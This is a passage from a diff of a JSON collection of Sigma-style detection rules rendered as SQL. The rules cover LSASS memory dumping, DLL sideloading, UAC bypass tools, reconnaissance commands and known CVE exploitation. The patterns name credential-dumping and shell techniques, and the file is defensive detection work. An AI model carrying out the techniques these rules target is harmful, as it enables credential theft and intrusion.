'%ifconfig%' ESCAPE '\\' OR 
CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", - "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", + "status": "experimental", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. 
This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion" ], "falsepositives": [ - "Valid user connecting using RDP" + "Legitimate usage of appcmd to add new URL rewrite rules" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "Legitimate usage of the script. 
Always investigate what's being registered to confirm if it's benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - 
"id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", - "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", + "status": "test", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Very unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", + "status": "experimental", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + 
"attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if 
the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_wmic_recon_service.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "status": "test", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Unknown" ], "level": "high", 
"rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Diantz Download and Compress Into a CAB File", + "id": "185d7418-f250-42d0-b72e-0c8b70661e93", + "status": "experimental", + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\dsparse.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\')" ], - "filename": "image_load_office_dsparse_dll_load.yml" + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml" }, { - "title": "Microsoft VBA For Outlook Addin Loaded Via Outlook", - "id": "9a0b8719-cd3c-4f0a-90de-765a4cb3f5ed", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", "status": "test", - "description": "Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.initial_access", + "attack.t1190", "attack.execution", - "attack.t1204.002" + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND ImageLoaded LIKE '\\\\outlvba.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_outlook_outlvba_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "CLR DLL Loaded Via Office Applications", - "id": "d13c43f0-f66b-4279-8b2c-5912077c1780", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects CLR DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\clr.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_clr_dll_load.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "GAC DLL Loaded Via Office Applications", - "id": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "status": "test", - "description": "Detects any GAC DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": 
[ - "Legitimate macro usage. Add the appropriate filter according to your environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (NewProcessName LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', 
'89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", - "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", + "status": "experimental", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + 
"title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", + "description": "Detect malicious GPO modifications can be used to implement many other malicious 
behaviors.", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Unlikely" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": 